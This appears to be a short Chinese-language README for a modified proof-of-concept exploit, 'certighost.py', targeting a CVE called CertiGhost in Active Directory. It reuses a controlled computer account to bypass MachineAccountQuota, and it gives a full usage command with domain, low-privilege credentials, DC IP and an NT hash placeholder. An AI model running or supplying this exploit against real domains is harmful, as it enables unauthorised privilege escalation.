此 POC 是 https://github.com/aniqfakhrul/CVE-2026-54121/blob/main/certighost.py 的原始 POC 代码,但做了一些细微修改,改为使用我们已经控制的计算机对象,而不是依赖创建新计算机(新计算机通常会受到 MachineAccountQuota 的限制)。
有关 CertiGhost 漏洞的更多信息,请参阅原始 仓库。
使用示例:
python3 certighost.py -d playground.local -u lowpriv -p Password123 \
--dc-ip 192.168.209.157 \
--computer-name MACHINEA$ \
--computer-hash <NT_HASH_MACHINE_A$>